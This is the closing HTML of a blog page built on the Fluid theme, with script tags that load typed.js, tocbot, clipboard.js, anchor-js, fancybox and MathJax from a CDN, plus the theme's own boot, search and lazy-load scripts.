<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
